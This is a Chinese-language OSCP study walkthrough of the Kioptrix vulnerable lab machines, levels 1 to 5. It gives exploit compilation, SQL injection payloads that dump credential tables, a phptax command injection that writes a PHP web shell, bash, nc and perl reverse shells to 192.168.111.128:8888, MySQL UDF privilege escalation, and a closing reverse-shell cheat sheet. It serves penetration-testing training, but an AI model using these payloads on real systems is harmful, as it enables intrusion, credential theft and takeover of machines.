附近语法错误，看不懂代码，用本地exp重新编译，报了这个错误，似乎是要加上这一个参数加上后还是报错，openssl版本问题，这是一个已经弃用的（deprecated）函数，百度了一下，需要使用-Wno-deprecated-declarations参数，就是前面的那个-Wdeprecated变成 -Wno-deprecated所以完整的参数是这样的，这样就能够成功编译了，命令如下gcc -o exp 47080.c -lcrypto -lssl -Wno-deprecated-declarations执行exp，他会告诉你怎么使用，以及每个参数的用法，英文好一点的就可以直接看，不好也没关系，翻译软件2s钟的事儿wapplyer插件，看web服务器版本使用exp会告诉你怎么使用，看着后面的apache，这个时候进行筛选就行了遇到这种good bye的那么就是利用失败，一个一个尝试就好了直到参数如下，成功获取到了shell，并且有一串提示信息貌似是执行过这几条命令，做一次历史命令信息收集，history，但是发现切换到tmp目录下面的时候什么也没有，看样子是没有下载文件尝试下载，但是下载失败了既然不能下载，那么我们使用kali下载，然后再传到靶机上面去利用kali下载文件后，使用python开启http服务可以看到下载成功根据之前的命令提示，按着顺序输入命令，进行编译后，就会断开连接重新连接，他就会自动执行刚刚编译好的exp文件这个时候就提权成功了，为什么会自动执行那个exp？查看源码就可以发现了samba提权这里是一种提权方法，还有另外一种smb提权，OSCP考试是不允许使用MSF的（只有一次机会），我找了很多kali自带的工具，都识别不到smb版本无奈，只能使用MSF了，识别出来了版本为 2.2.1a这里找到一个版本，第二个，因为第一个是MSF版本，我们需要手工利用exp编译，执行提权成功level 2主机探测syn全端口扫描nmap -sS -T5 192.168.111.184 -A使用curl访问80，可以看到是html信息弱口令，sql注入测试失败mysql远程连接，也失败了，提示了目标mysql服务器没有开启远程连接dirb目录扫描出来一个html页面，不知道是干什么的，不过看样子应该是和apache相关的信息文件使用wappalyzer插件，查看一些中间件服务版本和nmap指纹探测一波找找版本exp，目前收集到的信息，不能确认exp，唯一能能确定的就是那个拒绝服务攻击，但是对我们没什么用这里看到一个本地提权，待会应该能用上，先记着编号是 7550759端口信息不够，直接跳过，但是目前也没有什么可以利用的了，再返回登录框看看，再试试sql注入，注意这次的sql注入和我之前的sql注入是有区别的# 之前的 admin' and 1=1 --+ # 现在的（+号前面多了个空格） admin' and 1=1 -- + 万能密码成功其实也算不上是万能密码，我这样也能进去，只要打乱了sql语句就行了进去index.php后查看源码信息，哎呀卧槽，这里还有隐藏的代码，分析表单看样子是要执行一个ping命令，并且传参给pingit.php还是post请求那么就能得到这个接口请求的payload看样子是一个命令执行，但是尝试了如下反弹shell后，都没有反应ip=127.0.0.1 && /bin/bash -i >& /dev/tcp/192.168.111.128/8888 0>&1 nc 192.168.111.128 8888 -e /bin/bash试试whoami，我敲，看样子被耍了，这根本不是命令执行啊再看看源码有一个Administrator，可能也是一个有用的信息这里还有一种方法，就是新加一个页面在浏览器中以 html格式修改，把它原来的源码复制上去加上缺少的单引号回车，这样它的input框就出来了尝试127.0.0.1，这下有回显了，刚刚怎么没有？from.submit is not a fun，这个的大致意思呢就是，表单无效，hackbar模拟提交表单的时候，没有处罚javascript的表单提交的方法，那就是编码类型不对了因此切换表单提交的编码类型需要修改一下，这样就可以正常执行了这里执行命令的时候会发现，我使用一个 | 管道符，不管前面的命令是否执行成功，都只执行后面的那一条语句但是bash反弹shell的时候，是失败的，因为这个&和提交的表单数据冲突了需要修改为 %7C 为 | 的，但是这样很麻烦，换一种方法，直接在源页面写不更好嘛？在原来的页面写命令，这样会给我们的http post数据包自动编码反弹成功信息收集找到个这个根据提示加了-Wno-int-to-pointer-cast参数后，提示了很多的无效的指令（invalid instruction）切换思路，继续信息收集，使用lsb_release -a命令查看系统信息，可以看到是比较老的 centos 版本，存在很多漏洞漏洞检索，centos 4.5kali编译失败传到靶机试试（注意kali开启http服务）提权成功之前我们提到过一个服务的提权编号是7550，这里去尝试尝试查看源码，貌似却少一个文件，但是使用方法就是那样使用的，可以判断当前系统不存在此服务漏洞level 3主机发现，80探测节省时间，nmap放在后台扫描新建终端，dirb也放在后台扫描我们访问80端口wapplalyzer随便点点，这个页面，感觉没发现什么盲测sql注入bolg界面的框框xss字典攻击，失败这个时候nmap和dirb都扫完了，回去看看有一个phpmyadmin，弱口令 root/root弱口令爆破，全都是302跳转简单sql万能密码测试这里把密码清空，万能密码直接进去了并且可以写文件，这个为空就代表可以写文件show global variables like "secure%";网站根目录猜测为 /var/www/html写入文件测试，拒绝访问，没有使用密码切换方式，继续信息收集，刚刚目录扫描出来的一个登录框框检索漏洞，这里有一个命令执行漏洞，要用到MSF，再想想其他办法，考试只有一次机会github查找使用git clone 下来执行这个sh文件根据提示输入参数开启交互式终端信息收集/etc/passwd权限信息检索漏洞kali编译不了，我们传到靶机上试试提权失败又仔细看了看这个是小于号，不是小于等于用第一个试试，还是失败重新筛选一下，searchsploit 2.6.2 不使用2.6.24提权失败查找一下suid文件，看看能不能利用suid提权，好像并不行去home目录下面看看，loneferret用户文件夹下有一个 CompanyPolicy.README 文件，不知道是什么东西，打开看看，有个sudo -iHello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO 大致意思就是 您好新员工 这里的公司政策是使用我们新安装的软件来编辑、创建和查看文件。 请使用命令'sudo ht'。 不这样做将导致您立即终止。 DG 首席执行官我们再回到那个图片加载不出来的页面，想到可能是因为host问题，随便点一个链接，会发现ip跳转到 kioptrix3.com 这个域名，大概率是域名的问题，需要去host添加域名解析的 ipC:WindowsSystem32driversetchost这个时候再访问这个域名，页面就正常了再来测一测sql注入点这个试试选择id又有注入点了sql注入测试，sql语法错误，存在sql注入判断列数6列正常回显http://kioptrix3.com/gallery/gallery.php?id=1 order by 6-- +&sort=photoid#photos暴表http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--+&sort=photoid#photos暴列http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='gallarific_users'--+&sort=photoid#photos暴数据，得到账号密码，admin::n0t7t1k4http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(username,'::',password),3,4,5,6 from gallarific_users --+&sort=photoid#photos登录看看，密码错误切换这个用户试试，也不行同理，查，dev_accounts这张表http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(username,'::',password),3,4,5,6 from dev_accounts --+&sort=photoid#photos这样我们就看到了账号密码了，识别hashhash碰撞失败换一换其他工具转在线工具https://www.cmd5.com/default.aspx密码为starwars，登录成功sudo -l添加环境变量export TERM=xterm按 F3 或者 ALT+W 然后 方向键← ← ↓ 回车框中 输入/etc/sudoers保存退出sudo /bin/sh id提权成功第二种方法，就是用4089.c进行提权，第一个40616行不通，测试40839.c可行level 4主机发现curl判断80开启nmap扫描后，立马开始目录扫描弱口令，sql注入，admin/admin，123' and 1=1 --+这里有一个铭感文件泄露密码爆破myusernamemypasswordcookie伪造，也不行用nmap的 --script=vuln 参数试试，找找漏洞信息CVE-2007-6750拒绝服务攻击再回去看看目录，有一个database.sql文件，看样子是信息泄露了，看到了一条数据，但是还是登录失败没有思路了，再重头来一遍，在登录的地方密码处，存在一个sql注入漏洞，123' and 1=1 --+没有回显啊，不可能手工盲注啊，无奈了只能用sqlmapsqlmap -r post.txt --dump --batch --level 3登录进去后没有任何东西，就一个退出登录试试ssh登录# 注意这里要加一个参数，不然会登录失败，应该是目标靶机ssh版本低所导致的 ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.111.186两个账号都登录成功了一开始就有一个提示了，让我们使用help命令，似乎是只能使用这些命令来进行接下来的操作shell逃逸可以看到root用户启动了一个mysql进程suid文件查看，貌似没有可以利用的提权命令，sudo这些用户都不能用已知站点是php站点，查找一下php的文件，看看有没有可以利用的地方，比如mysql配置文件查找登录界面的信息，看到了mysql的账号密码（没有密码）登录mysql的提权方式有一个叫做udf提权，我们去看看udf表利用 sys_exec()函数将john用户添加到管理员组。sudo su （用于切换到超级用户"root"的shell）输入账号密码，提权成功level 5 Kioptrix2014同时进行，nmap主机探测立马nmap指纹识别，后curl 80探测，第三个终端目录扫描首页查看响应的源码访问，不知道是什么东西，应该是目录枚举了，和我们获取权限没有什么关系直接搜，刚好版本是一模一样的这里有漏洞的利用方式访问到文件信息了，任意文件查看看看其他信息，操作系统为FreeBSD编译后的exp提示，是没有apache 2.2.x版本的，所以第一关里面的方法利用不了了看其他信息，有一个8080端口403拒绝访问去看看apache配置文件（一般都在/usr/local/etc/apache2x/httpd.conf），利用刚刚的文件枚举漏洞，查看正常访问了，有一个phptax页面又是一个新页面随便点一点试试关键检索，有一个代码执行漏洞查看24665.txt访问后，应该是没有nc，执行不了命令/bin/bash -i >& /dev/tcp/192.168.111.128/8888 0>&1 nc 192.168.111.128 8888 -e /bin/bash写入一句话马试试http://192.168.111.149:8080/phptax/drawimage.php?pfilez=1040pg1.pdf;echo "<?php system($_GET['cmd']); ?>" > shell1.php;&pdf=make# 反弹不了命令，就多试几个，总有一个能用 perl -e 'use Socket;$i="192.168.111.128";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.111.128:8888");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'这里使用的是 perl sh反弹成功了目标靶机上没有python，创建不了交互式终端，但是并不影响我们提权查内核信息查SUID文件，基本的sudo都没有，去检索内核根据内核信息有俩个权限提升漏洞这里看靶机是没有wget和curl的，但是有nc小知识，nc也是可以传文件的（测试过很多遍，没传成功），还有个技巧就是利用ftp# 攻击机开启ftp python3 -m pyftpdlib # 靶机连接 ftp ftp://192.168.111.128:2121/file搞了半天，kali新版的python的开不了，人麻了，传到本机来开成功传上去了exp传上去后gcc -o exp exploit.c ./exp即可提权成功，我这里环境出问题了，显示不了了怎么创建交互式终端都不行，害命令小姐# 创建交互式终端的几种方式 echo os.system("/bin/bash") python -c "import pty; pty.spawn('/bin/bash')" /bin/sh -i gcc -o exp xxx.c # c文件编译，-o表示的是输出的文件名称 python -m http.server # 开启小型的http服务 python3 -m ptyftpdlib # 开启小型的ftp服务器 ftp ftp://ip:port/file #使用ftp接收文件 # 常用的反弹shell /bin/bash -i >& /dev/tcp/192.168.111.128/8888 0>&1 nc 192.168.111.128 8888 -e /bin/bash # 注意这里要加一个参数，不然会登录失败，应该是目标靶机ssh版本低所导致的 ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.111.186 usermod -a -G admin john # 将john用户添加到admin组 # mysql提权(udf提权)用到的表（查） select * from mysql.func; select sys_exec('commend'); uname -a # 查看系统的全部信息哪些好的资料可以分享？我在学习和备考的时候参考的一些不错的资源，汇总如下：注册指南：《OSCP认证教程第一集：注册教程》https://www.freebuf.com/column/194605.htmlLinux提权指南：https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/Windows提权辅助脚本：https://github.com/pentestmonkey/windows-privesc-check模拟练习平台（跟Lab环境类似）：vulnhub https://www.vulnhub.com/ hackthebox https://www.hackthebox.eu/badchars工具：https://github.com/mgeeky/expdevBadChars往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录